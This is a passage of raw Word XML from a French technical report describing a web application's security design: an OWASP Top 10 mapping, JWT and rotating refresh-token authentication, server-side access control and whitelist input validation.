              <w:t xml:space="preserve">JWT_SECRET_KEY</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, CORS restreint,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">debug=False</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">en cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06 Composants vulnérables</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Versions figées, fichier de verrouillage commité, audit des dépendances en intégration continue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 11, § 9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A07 Défaillances d'identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rotation des refresh tokens, révocation, limitation de débit, politique de mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A08 Défaut d'intégrité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cascades déclarées au niveau du SGBD, contraintes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CHECK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 5.4, § 5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09 Défaut de journalisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Journal des interactions IA ; journalisation applicative incomplète</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A10 SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Seule URL sortante :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">OLLAMA_URL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, valeur de configuration, jamais une entrée utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>§ 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkStart w:id="111" w:name="X1179a7596a90fd5247116224b66a6246aec35d8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Authentification et gestion des sessions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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mesure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>bcrypt avec sel aléatoire par empreinte ; politique 8 caractères, majuscule, minuscule, chiffre, vérifiée côté serveur (§ 7.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Access token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JWT HS256, durée 15 minutes, jamais stocké en base, transmis en en-tête</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Authorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Refresh token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">64 octets aléatoires, cookie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">httpOnly</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">Secure</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>SameSite=Strict</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>path=/auth, session de 7 jours côté serveur (§ 7.4)</w:t>
            </w:r>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stockage du refresh token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Empreinte SHA-256 uniquement : une fuite de la base ne permet pas de rejouer une session (§ 7.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Rotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chaque usage consomme le jeton et en émet un nouveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Détection de vol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">La réutilisation d'un jeton consommé révoque</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">toutes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">les sessions du compte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Réinitialisation de mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Jeton à usage unique, expiration 1 h, empreinte SHA-256 en base,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">toutes les sessions révoquées</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">au changement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le dernier point est celui qu'on oublie le plus souvent : changer son mot de passe après une compromission ne sert à rien si les sessions ouvertes par l'attaquant survivent. La route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/auth/reset-password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">supprime donc l'ensemble des lignes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">du compte concerné avant de valider la transaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Les deux niveaux de jeton répondent à deux besoins contradictoires.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un jeton court est sûr mais impose de se reconnecter souvent ; un jeton long est confortable mais dangereux. La combinaison access token court non révocable et refresh token long révocable donne les deux : une fenêtre d'exposition de 15 minutes en cas de vol de l'access token, et une révocation immédiate possible côté serveur.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="111"/>
    <w:bookmarkStart w:id="112" w:name="Xdadf8af551b613e25f307363b8f299d2c78a890"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Contrôle d'accès</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux surfaces distinctes, deux mécanismes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Accès horizontal — les données d'un autre utilisateur.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Chaque requête portant sur un document, un dossier ou un historique IA inclut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">user_id == request.user_id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dans sa clause</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 7.3). L'identifiant présent dans l'URL n'est jamais tenu pour légitime, et un identifiant appartenant à autrui produit un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">404</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>indiscernable d'un identifiant inexistant (§ 5.7). Les identifiants étant des UUID v4, ils ne sont de toute façon pas énumérables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Accès vertical — les fonctions d'administration.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Le rôle n'est pas dans le JWT : il est relu en base à chaque appel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(§ 7.4). Côté client, l'entrée de menu est masquée et la garde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requiresAdmin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>du routeur bloque l'accès direct à l'URL — mais ces deux mesures sont du confort d'usage. Le contrôle qui compte est celui du serveur, et c'est celui que vérifient les cas TS-03 et TS-04 (§ 9).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="112"/>
    <w:bookmarkStart w:id="113" w:name="X0856e72d2535064ec86753a7cf4ff712e4fe370"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Validation des entrées</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Toute entrée est validée dans la couche routes, avant tout accès à la base : type, longueur, et appartenance à une liste blanche pour les valeurs énumérées.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Champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Contrôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">type_action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liste blanche :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">reformuler</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">corriger</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">completer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liste blanche :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">selection</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Chaîne non vide, ≤ 3 000 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">instructions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chaîne, ≤ 500 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chaîne non vide après</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">strip()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, ≤ 255 caractères</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">status</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Listes blanches</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Liste blanche :</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">user</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">quota_daily_limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entier, borné entre 1 et 1000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">page</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">per_page</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Entiers,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">per_page</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">≤ 50</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deux détails de ce tableau valent un commentaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Les listes blanches plutôt que des listes noires.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Énumérer ce qui est autorisé est sûr par construction ; énumérer ce qui est interdit laisse toujours une valeur non prévue passer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le contrôle du quota exclut explicitement les booléens</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Figure"/>
        <w:spacing w:before="80" w:after="40"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5347257" cy="288391"/>
